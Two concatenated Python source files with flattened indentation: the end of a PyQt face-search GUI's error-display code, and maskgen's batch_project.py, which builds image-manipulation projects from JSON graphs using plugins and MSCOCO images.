self.lab2_shadow = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=1,yOffset=1,color=QtGui.QColor(222, 18, 21))
self.lab2.setGraphicsEffect(self.lab2_shadow)
self.alert_err.setStyleSheet("#alert_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err.setFont(font)
self.shadow_red = QtWidgets.QGraphicsDropShadowEffect(self.alert_err,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.alert_err.setGraphicsEffect(self.shadow_red)
else:
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.label_noinfo.setText("")
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.label.setText("")
self.label2.setText("")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.lab2.setStyleSheet("#card2{background:transparent;border-image:url('./src/images/id2.png');}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
elif self.start_error == None:
self.no_faces_error_func()
else:
self.many_faces_error_func()
def no_faces_error_func(self):
self.label_noinfo.setText("NO INFORMATIONS")
self.popup_icon_err.setGeometry(QtCore.QRect(170,30,150,150))
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err_face.setGeometry(QtCore.QRect(135,70,350,200))
self.label_err_face.setText("NO FACE DETECTED")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect(self.lab,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
def many_faces_error_func(self):
self.label_noinfo.setText("NO INFORMATIONS")
self.popup_icon_err.setGeometry(QtCore.QRect(170,30,150,150))
self.label_err_face.setGeometry(QtCore.QRect(70,70,380,200))
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err_face.setText("TOO MANY FACES DETECTED")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect(self.lab,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
def reload(self):
global path
path = None
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect()
self.shadow_lab_red.setEnabled(False)
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(0, 133, 57,0.2);border:1px solid green;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.upload.setGeometry(QtCore.QRect(270, 20, 355, 350))
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.upload.setStyleSheet("#upload{background:transparent;border-image:url('./src/images/face1.png');}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.frame_err.setStyleSheet("#frame_err{background:transparent}")
self.label.setText("")
self.label2.setText("")
self.label_err.setText("")
self.label_noimg.setText("NO IMAGE")
self.label_noimg2.setText("AVAILABLE")
self.label_noinfo.setText("NO INFORMATIONS")
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("Polaris", "Polaris"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Search for faces"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Add faces"))
|
batch_project.py
|
import json
import networkx as nx
import argparse
import sys
from networkx.readwrite import json_graph
import os
from maskgen import software_loader
from maskgen import scenario_model
import random
from maskgen import tool_set
import shutil
from maskgen import plugins
from maskgen import group_operations
import logging
from threading import Thread, local, currentThread
from maskgen.batch.permutations import *
import time
from maskgen.loghandling import set_logging
from threading import Lock
from datetime import datetime
import skimage.io as io
import numpy as np
from pycocotools.coco import COCO
import PIL
#set all parameters
dataDir='/dvmm-filer2/users/xuzhang/Medifor/data/MSCOCO/'
dataType='train2014'
annFile='%s/annotations/instances_%s.json'%(dataDir,dataType)
coco=None #COCO(annFile)
imgIds = None #coco.getImgIds()
COCO_flag = False
base_name = None
class IntObject:
"""Thread-safe counter; used here to track how many projects remain to be built."""
value = 0
lock = Lock()
def __init__(self, value=0):
self.value = value
def decrement(self):
# returns the value as it was before the decrement
with self.lock:
current_value = self.value
self.value -= 1
return current_value
def increment(self):
with self.lock:
self.value += 1
return self.value
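# Usage sketch (illustrative only; mirrors the loop in thread_worker() further below):
#   remaining = IntObject(10)
#   while remaining.decrement() > 0:
#       pass  # build one project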
def loadJSONGraph(pathname):
with open(pathname, "r") as f:
try:
json_data = json.load(f, encoding='utf-8')
except ValueError:
# fall back to the default decoder; rewind, since the first attempt consumed the stream
f.seek(0)
json_data = json.load(f)
G = json_graph.node_link_graph(json_data, multigraph=False, directed=True)
return BatchProject(G, json_data)
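# Illustrative, hypothetical shape of the node-link JSON consumed above; the key
# names follow networkx json_graph conventions and the attributes referenced by
# this module (op_type, plugin, image_directory, picklist, graph-level name and
# username); the concrete values are examples only:
#   {"directed": true, "graph": {"name": "demo", "username": "batcher", "recompress": false},
#    "nodes": [{"id": "base", "op_type": "BaseSelection", "image_directory": "/data/bases", "picklist": "bases"},
#              {"id": "blur", "op_type": "PluginOperation", "plugin": "GaussianBlur"}],
#    "links": [{"source": "base", "target": "blur"}]}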
def buildIterator(spec_name, param_spec, global_state, random_selection=False):
"""
:param param_spec: argument specification
:param random_selection: produce a continuous stream of random selections
:return: a iterator function to construct an iterator over possible values
"""
if param_spec['type'] == 'list':
if not random_selection:
return ListPermuteGroupElement(spec_name, param_spec['values'])
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.choice(param_spec['values'])))
elif 'int' in param_spec['type'] :
v = param_spec['type']
vals = [int(x) for x in v[v.rfind('[') + 1:-1].split(':')]
beg = vals[0] if len(vals) > 0 else 0
end = vals[1] if len(vals) > 1 else beg+1
if not random_selection:
increment = 1
if len(vals) > 2:
increment = vals[2]
return IteratorPermuteGroupElement(spec_name,lambda : xrange(beg, end+1,increment).__iter__())
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.randint(beg, end)))
elif 'float' in param_spec['type'] :
v = param_spec['type']
vals = [float(x) for x in v[v.rfind('[') + 1:-1].split(':')]
beg = vals[0] if len(vals) > 0 else 0
end = vals[1] if len(vals) > 1 else beg+1.0
if not random_selection:
increment = 1
if len(vals) > 2:
increment = vals[2]
return IteratorPermuteGroupElement(spec_name,lambda: np.arange(beg, end,increment).__iter__())
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: beg+ random.random()* (end-beg)))
elif param_spec['type'] == 'yesno':
if not random_selection:
return ListPermuteGroupElement(spec_name,['yes','no'])
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.choice(['yes', 'no'])))
elif param_spec['type'].startswith('donor'):
mydata = local()
local_state = mydata.current_local_state
choices = [node for node in local_state.getGraph().nodes() \
if len(local_state.getGraph().predecessors(node)) == 0]
if not random_selection:
# do not think we can save this state since it is tied to the local project
return PermuteGroupElement(spec_name,choices.__iter__)
else:
return PermuteGroupElement(spec_name, randomGeneratorFactory(lambda: random.choice(choices)))
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: None))
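# Illustrative parameter specifications accepted by buildIterator(), derived from
# the parsing above (all concrete values are made up):
#   {"type": "list", "values": ["jpg", "png"]}   -> permutes over / randomly picks from the list
#   {"type": "int[2:10:2]"}                      -> 2, 4, 6, 8, 10 (begin:end:step)
#   {"type": "float[0.5:2.0:0.25]"}              -> numpy.arange(0.5, 2.0, 0.25)
#   {"type": "yesno"}                            -> 'yes' or 'no'
#   {"type": "donor"}                            -> a node without predecessors in the current project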
def pickArg(param_spec, node_name, spec_name, global_state, local_state):
"""
:param global_state:
:param name: name of the of iterator (within the group)
:param permutegroup: the name of the permutation group
:param toIteratorFunction: initialize iterator with this function if missing or exhausted
:return:
"""
manager = global_state['permutegroupsmanager']
permutegroup = param_spec['permutegroup'] if 'permutegroup' in param_spec else None
if not manager.has_specification(permutegroup, node_name + '.' + spec_name):
manager.loadParameter(permutegroup,
buildIterator(node_name + '.' + spec_name,param_spec, global_state, random_selection=permutegroup is None))
return manager.current(permutegroup, node_name + '.' + spec_name)
pluginSpecFuncs = {}
def loadCustomFunctions():
import pkg_resources
for p in pkg_resources.iter_entry_points("maskgen_specs"):
logging.getLogger('maskgen').info( 'load spec ' + p.name)
pluginSpecFuncs[p.name] = p.load()
def callPluginSpec(specification, local_state):
if specification['name'] not in pluginSpecFuncs:
raise ValueError("Invalid specification name:" + str(specification['name']))
if 'state_name' in specification:
if specification['state_name'] not in local_state:
local_state[specification['state_name']] = dict()
return pluginSpecFuncs[specification['name']](specification['parameters'],
state=local_state[specification['state_name']])
return pluginSpecFuncs[specification['name']](specification['parameters'])
def executeParamSpec(specification_name, specification, global_state, local_state, node_name, predecessors):
import copy
"""
:param specification:
:param global_state:
:param local_state:
:param predecessors:
:return:
@rtype : tuple(image_wrap.ImageWrapper,str)
@type predecessors: List[str]
"""
if specification['type'] == 'mask':
source = getNodeState(specification['source'], local_state)['node']
target = getNodeState(specification['target'], local_state)['node']
return os.path.join(local_state['model'].get_dir(), local_state['model'].getGraph().get_edge_image(source,
target,
'maskname')[1])
elif specification['type'] == 'value':
return specification['value']
elif specification['type'] == 'variable':
if 'permutegroup' in specification:
source_spec = copy.copy(getNodeState(specification['source'], local_state)[specification['name']])
source_spec['permutegroup'] = specification['permutegroup']
return pickArg(source_spec,node_name,specification_name,global_state, local_state)
else:
return getNodeState(specification['source'], local_state)[specification['name']]
elif specification['type'] == 'donor':
if 'source' in specification:
return getNodeState(specification['source'], local_state)['node']
return random.choice(predecessors)
elif specification['type'] == 'imagefile':
source = getNodeState(specification['source'], local_state)['node']
return local_state['model'].getGraph().get_image(source)[1]
elif specification['type'] == 'input':
return getNodeState(specification['source'], local_state)['output']
elif specification['type'] == 'plugin':
return callPluginSpec(specification,local_state)
return pickArg(specification,node_name, specification_name, global_state, local_state)
def pickArgs(local_state, global_state, node_name, argument_specs, operation,predecessors):
"""
:param local_state:
:param global_state:
:param argument_specs:
:param operation:
:param predecessors:
:return:
@type operation : Operation
@type predecessors: List[str]
"""
startType = local_state['model'].getStartType()
args = {}
if argument_specs is not None:
for spec_param, spec in argument_specs.iteritems():
args[spec_param] = executeParamSpec(spec_param, spec, global_state,local_state, node_name, predecessors)
for param in operation.mandatoryparameters:
if argument_specs is None or param not in argument_specs:
paramDef = operation.mandatoryparameters[param]
if 'source' in paramDef and paramDef['source'] is not None and paramDef['source'] != startType:
continue
v = pickArg(paramDef,node_name, param,global_state,local_state)
if v is None:
raise ValueError('Missing Value for parameter ' + param + ' in ' + operation.name)
args[param] = v
for param in operation.optionalparameters:
if argument_specs is None or param not in argument_specs:
v = pickArg(operation.optionalparameters[param],node_name, param,global_state,local_state)
if v is not None:
args[param] = v
return args
def getNodeState(node_name,local_state):
"""
:param local_state:
:param node_name:
:return:
@type local_state: Dict
@type node_name: str
@rtype: Dict
"""
if node_name in local_state:
my_state = local_state[node_name]
else:
my_state = {}
local_state[node_name] = my_state
return my_state
def working_abs_file(global_state,filename):
return os.path.join(global_state['workdir'] if 'workdir' in global_state else '.',filename)
def pickImageIterator(specification, spec_name, global_state):
if 'picklists' not in global_state:
global_state['picklists'] = dict()
picklist_name = specification['picklist'] if 'picklist' in specification else spec_name
if picklist_name not in global_state['picklists']:
element= FilePermuteGroupElement(spec_name,
specification['image_directory'],
tracking_filename=picklist_name + '.txt')
global_state['picklists'][picklist_name] = element
else:
link_element =global_state['picklists'][picklist_name]
element = LinkedPermuteGroupElement(spec_name,link_element)
return element
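# Reading of pickImageIterator (added comment, not original documentation): nodes
# that declare the same 'picklist' share one FilePermuteGroupElement; subsequent
# nodes receive a LinkedPermuteGroupElement so they draw files from the same
# tracked list rather than opening a second, independent iterator.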
def pickImage(node, global_state={}):
with global_state['picklistlock']:
listing = []
if node['picklist'] not in global_state:
if not os.path.exists(node['image_directory']):
raise ValueError("ImageSelection missing valid image_directory: " + node['image_directory'])
#listing = os.listdir(node['image_directory'])
print(node['image_directory'] + '/' + node['picklist'] + '.txt')
if os.path.exists(node['image_directory'] + '/' + node['picklist'] + '.txt'):
with open(node['image_directory'] + '/' + node['picklist'] + '.txt', 'r') as fp:
for line in fp.readlines():
line = line.strip()
listing.append(line)
global_state[node['picklist']] = listing
else:
listing = global_state[node['picklist']]
if len(listing) == 0:
raise ValueError("Picklist of Image Files Empty")
pick = random.choice(listing)
#listing.remove(pick)
#if node['picklist'] not in global_state['picklists_files']:
# global_state['picklists_files'][node['picklist']] = \
# open(node['picklist'] + '.txt', 'a')
#global_state['picklists_files'][node['picklist']].write(pick + '\n')
#global_state['picklists_files'][node['picklist']].flush()
return os.path.join(node['image_directory'], pick)
def pickImage_COCO(node, global_state={}):
with global_state['picklistlock']:
img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]
print('Base image name: {}'.format(img['file_name']))
return os.path.join(node['image_directory'], img['file_name'])
def pickImage_COCO_with_Mask(node, global_state={}):
with global_state['picklistlock']:
img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]
annIds = coco.getAnnIds(imgIds=img['id'], iscrowd=None)
anns = coco.loadAnns(annIds)
print('Donor image name: {}'.format(img['file_name']))
if len(anns)==0:
tmp_img = PIL.Image.open(os.path.join(node['image_directory'], img['file_name']))
h,w = tmp_img.size
real_mask = np.zeros((w, h), dtype=np.uint8)
real_mask[w/4:3*w/4,h/4:3*h/4] = 1
else:
#try multiple times to find out spliced area that has proper size
num_trial = 0
#number of max trial
max_trial = min(len(anns),5)
while num_trial<max_trial:
real_mask = coco.annToMask(anns[np.random.randint(0,len(anns))])
real_mask = real_mask.astype(np.uint8)
x, y, w, h = tool_set.widthandheight(real_mask)
if w*h>32*32:
break
num_trial = num_trial+1
if num_trial==max_trial:
tmp_img = PIL.Image.open(os.path.join(node['image_directory'], img['file_name']))
h,w = tmp_img.size
real_mask = np.zeros((w, h), dtype=np.uint8)
real_mask[w/4:3*w/4,h/4:3*h/4] = 1
real_mask = (1-real_mask.astype(np.uint8))*255
w, h = real_mask.shape
mask = np.empty((w, h, 3), dtype=np.uint8)
mask[:, :, 0] = real_mask
mask[:, :, 1] = real_mask
mask[:, :, 2] = real_mask
io.imsave('./tests/mask/COCO_train2014_02.png', mask)
with open('./tests/mask/classifications.csv', 'w') as f:
f.write('"[0,0,0]",object')
return os.path.join(node['image_directory'], img['file_name'])
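# Note on the files written above (reading of the code, not original docs): the
# chosen COCO annotation mask is inverted so the object region becomes [0,0,0]
# and the background 255, saved as a 3-channel PNG, while classifications.csv
# maps that black region to the label "object" for downstream plugins.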
class BatchOperation:
def execute(self,graph, node_name, node, connect_to_node_name,local_state={},global_state={}):
"""
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
pass
class ImageSelectionOperation(BatchOperation):
def execute(self, graph, node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Add a image to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type local_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
# pick image from MSCOCO
if COCO_flag:
pick = pickImage_COCO_with_Mask(node, global_state = global_state)
else:
manager = global_state['permutegroupsmanager']
pick = manager.current( node['permutegroup'] if 'permutegroup' in node else None,
node_name)
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
getNodeState(node_name,local_state)['node'] = local_state['model'].addImage(pick)
return local_state['model']
class BaseSelectionOperation(BatchOperation):
def execute(self, graph,node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Add a image to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
manager = global_state['permutegroupsmanager']
if COCO_flag:
pick = pickImage_COCO(node,global_state =global_state)
else:
pick = pickImage( node,global_state =global_state)
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
pick_file = os.path.split(pick)[1]
name = pick_file[0:pick_file.rfind('.')]
dir = os.path.join(global_state['projects'],name)
now = datetime.now()
# we should keep all the name stable
timestr = now.strftime("%Y%m%d-%H%M%S-%f")
suffix = '_' + timestr
dir = dir + suffix
name = name + suffix
os.mkdir(dir)
file_path_in_project = os.path.join(dir,pick_file)
shutil.copy2(pick, file_path_in_project)
logging.getLogger('maskgen').info("Thread {} build project {}".format(currentThread().getName(),pick_file))
if COCO_flag:
local_state['model'] = scenario_model.createProject(dir, timestr = now.strftime("%Y%m%d-%H%M%S-%f"), suffixes=tool_set.suffixes)[0]
else:
local_state['model'] = scenario_model.createProject(dir,
name=name,
base=file_path_in_project,
suffixes=tool_set.suffixes)[0]
for prop, val in local_state['project'].iteritems():
local_state['model'].setProjectData(prop, val)
getNodeState(node_name, local_state)['node'] = local_state['model'].getNodeNames()[0]
return local_state['model']
class BaseAttachmentOperation(BatchOperation):
def execute(self, graph,node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Represent the attachment node, attaching its name to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
getNodeState(node_name, local_state)['node'] = local_state['start node name']
return local_state['model']
class PluginOperation(BatchOperation):
logger = logging.getLogger('maskgen')
def execute(self, graph, node_name, node,connect_to_node_name, local_state={},global_state={}):
"""
Add a node through an operation.
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
my_state = getNodeState(node_name,local_state)
predecessors = [getNodeState(predecessor, local_state)['node'] \
for predecessor in graph.predecessors(node_name) \
if predecessor != connect_to_node_name and 'node' in getNodeState(predecessor, local_state)]
predecessor_state=getNodeState(connect_to_node_name, local_state)
local_state['model'].selectImage(predecessor_state['node'])
im, filename = local_state['model'].currentImage()
plugin_name = node['plugin']
plugin_op = plugins.getOperation(plugin_name)
if plugin_op is None:
raise ValueError('Invalid plugin name "' + plugin_name + '" with node ' + node_name)
op = software_loader.getOperation(plugin_op['name'],fake=True)
args = pickArgs(local_state,
global_state,
node_name,
node['arguments'] if 'arguments' in node else None,
op,
predecessors)
if 'experiment_id' in node:
args['experiment_id'] = node['experiment_id']
args['skipRules'] = True
args['sendNotifications'] = False
self.logger.debug('Thread {} Execute plugin {} on {} with {}'.format(currentThread().getName(),
plugin_name ,
filename ,
str(args)))
errors, pairs = local_state['model'].imageFromPlugin(plugin_name, **args)
if errors is not None or (type(errors) is list and len (errors) > 0 ):
raise ValueError("Plugin " + plugin_name + " failed:" + str(errors))
my_state['node'] = pairs[0][1]
for predecessor in predecessors:
local_state['model'].selectImage(predecessor)
local_state['model'].connect(my_state['node'],
sendNotifications=False,
skipDonorAnalysis='skip_donor_analysis' in node and node['skip_donor_analysis'])
local_state['model'].selectImage(my_state['node'])
return local_state['model']
class InputMaskPluginOperation(PluginOperation):
logger = logging.getLogger('maskgen')
def execute(self, graph, node_name, node,connect_to_node_name, local_state={},global_state={}):
"""
Add a node through an operation.
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
my_state = getNodeState(node_name,local_state)
predecessors = [getNodeState(predecessor, local_state)['node'] for predecessor in graph.predecessors(node_name) \
if predecessor != connect_to_node_name and 'node' in getNodeState(predecessor, local_state)]
predecessor_state=getNodeState(connect_to_node_name, local_state)
local_state['model'].selectImage(predecessor_state['node'])
im, filename = local_state['model'].currentImage()
plugin_name = node['plugin']
plugin_op = plugins.getOperation(plugin_name)
if plugin_op is None:
raise ValueError('Invalid plugin name "' + plugin_name + '" with node ' + node_name)
op = software_loader.getOperation(plugin_op['name'],fake=True)
args = pickArgs(local_state, global_state,node_name, node['arguments'] if 'arguments' in node else None, op,
predecessors)
args['skipRules'] = True
args['sendNotifications'] = False
targetfile,params = self.imageFromPlugin(plugin_name, im, filename, node_name, local_state, **args)
my_state['output'] = targetfile
if params is not None and type(params) == type({}):
for k, v in params.iteritems():
my_state[k] = v
return local_state['model']
def imageFromPlugin(self, filter, im, filename, node_name, local_state, **kwargs):
import tempfile
"""
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (str, list (str,str))
"""
file = os.path.split(filename)[1]
file = file[0:file.rfind('.')]
target = os.path.join(tempfile.gettempdir(), file+ '_' + filter + '.png')
shutil.copy2(filename, target)
params = {}
try:
extra_args, msg = plugins.callPlugin(filter, im, filename, target, **kwargs)
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs:
params[k] = v
except Exception as e:
msg = str(e)
raise ValueError("Plugin " + filter + " failed:" + msg)
return target,params
class ImageSelectionPluginOperation(InputMaskPluginOperation):
logger = logging.getLogger('maskgen')
def imageFromPlugin(self, filter, im, filename, node_name, local_state, **kwargs):
import tempfile
"""
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (str, list (str,str))
"""
file = os.path.split(filename)[1]
file = file[0:file.rfind('.')]
target = os.path.join(tempfile.gettempdir(), file+ '_' + filter + '.png')
shutil.copy2(filename, target)
params = {}
try:
extra_args, msg = plugins.callPlugin(filter, im, filename, target, **kwargs)
if 'file' not in extra_args:
raise ValueError('file key expected in result to identify chosen file')
else:
pick = extra_args.pop('file')
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
getNodeState(node_name, local_state)['node'] = local_state['model'].addImage(pick)
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs:
params[k] = v
os.remove(target)
except Exception as e:
msg = str(e)
raise ValueError("Plugin " + filter + " failed:" + msg)
return target,params
batch_operations = {'BaseSelection': BaseSelectionOperation(),
'ImageSelection':ImageSelectionOperation(),
'ImageSelectionPluginOperation':ImageSelectionPluginOperation(),
'PluginOperation' : PluginOperation(),
'InputMaskPluginOperation' : InputMaskPluginOperation(),
'NodeAttachment': BaseAttachmentOperation()}
def getOperationGivenDescriptor(descriptor):
"""
:param descriptor:
:return:
@rtype : BatchOperation
"""
return batch_operations[descriptor['op_type']]
def findBaseNodes(graph, node):
predecessors = graph.predecessors(node)
if len(predecessors) == 0:
return [node]
nodes = []
for pred in predecessors:
nodes.extend(findBaseNodes(graph,pred))
return nodes
def findBaseImageNodes(graph,node):
"""
:param graph:
:param node:
:return:
@type graph: nx.DiGraph
"""
return [node for node in findBaseNodes(graph,node) if
graph.node[node]['op_type'] == 'BaseSelection']
class BatchProject:
logger = logging.getLogger('maskgen')
G = nx.DiGraph(name="Empty")
def __init__(self,G,json_data):
"""
:param G:
@type G: nx.DiGraph
"""
self.G = G
self.json_data = json_data
tool_set.setPwdX(tool_set.CustomPwdX(self.G.graph['username']))
def _buildLocalState(self):
local_state = {}
local_state['project'] = {}
for k in self.G.graph:
if k not in ['recompress','name']:
local_state['project'][k] = self.G.graph[k]
return local_state
def getName(self):
return self.G.graph['name'] if 'name' in self.G.graph else 'Untitled'
def executeForProject(self, project, nodes):
recompress = self.G.graph['recompress'] if 'recompress' in self.G.graph else False
global_state = {'picklists_files': {},
'project': self,
'workdir': project.get_dir(),
'count': None,
'permutegroupsmanager': PermuteGroupManager(dir=project.get_dir())
}
local_state = self._buildLocalState()
mydata = local()
mydata.current_local_state = local_state
self.logger.info('Thread {} building project with global state: {} '.format(currentThread().getName(),
str(global_state)))
local_state['model'] = project
base_node = self._findBase()
try:
for node in nodes:
# establish the starting point
local_state['start node name'] = node
completed = []
queue = [base_node]
queue.extend(self.G.successors(base_node))
while len(queue) > 0:
op_node_name = queue.pop(0)
if op_node_name in completed:
continue
predecessors = list(self.G.predecessors(op_node_name))
# skip if a predecessor is missing
if len([pred for pred in predecessors if pred not in completed]) > 0:
continue
connecttonodes = [predecessor for predecessor in self.G.predecessors(op_node_name)
if self.G.node[predecessor]['op_type'] != 'InputMaskPluginOperation']
connect_to_node_name = connecttonodes[0] if len(connecttonodes) > 0 else None
self._execute_node(op_node_name, connect_to_node_name, local_state, global_state)
completed.append(op_node_name)
self.logger.debug('{} Completed: {}'.format(currentThread().getName(), op_node_name))
queue.extend(self.G.successors(op_node_name))
if recompress:
self.logger.debug("Run Save As")
op = group_operations.CopyCompressionAndExifGroupOperation(project)
op.performOp()
local_state['model'].renameFileImages()
if 'archives' in global_state:
project.export(global_state['archives'])
except Exception as e:
project_name = project.getName()
logging.getLogger('maskgen').error('Creation of project {} failed: {}'.format(project_name, str(e)))
return False
return True
def executeOnce(self, global_state=dict()):
#print 'next ' + currentThread().getName()
global_state['permutegroupsmanager'].save()
global_state['permutegroupsmanager'].next()
recompress = self.G.graph['recompress'] if 'recompress' in self.G.graph else False
local_state = self._buildLocalState()
mydata = local()
mydata.current_local_state = local_state
self.logger.info('Thread {} building project with global state: {} '.format(currentThread().getName (),
str(global_state)))
base_node = self._findBase()
try:
self._execute_node(base_node, None, local_state, global_state)
queue = [top for top in self._findTops() if top != base_node]
queue.extend(self.G.successors(base_node))
completed = [base_node]
while len(queue) > 0:
op_node_name = queue.pop(0)
if op_node_name in completed:
continue
predecessors = list(self.G.predecessors(op_node_name))
# skip if a predecessor is missing
if len([pred for pred in predecessors if pred not in completed]) > 0:
continue
connecttonodes = [predecessor for predecessor in self.G.predecessors(op_node_name)
if self.G.node[predecessor]['op_type'] != 'InputMaskPluginOperation']
node = self.G.node[op_node_name]
if len(connecttonodes) > 0 and 'source' in node:
connect_to_node_name = node['source']
else:
connect_to_node_name = connecttonodes[0] if len(connecttonodes) > 0 else None
self._execute_node(op_node_name, connect_to_node_name, local_state, global_state)
completed.append(op_node_name)
self.logger.debug('{} Completed: {}'.format(currentThread().getName (),op_node_name))
queue.extend(self.G.successors(op_node_name))
if recompress:
self.logger.debug("Run Save As")
op = group_operations.CopyCompressionAndExifGroupOperation(local_state['model'])
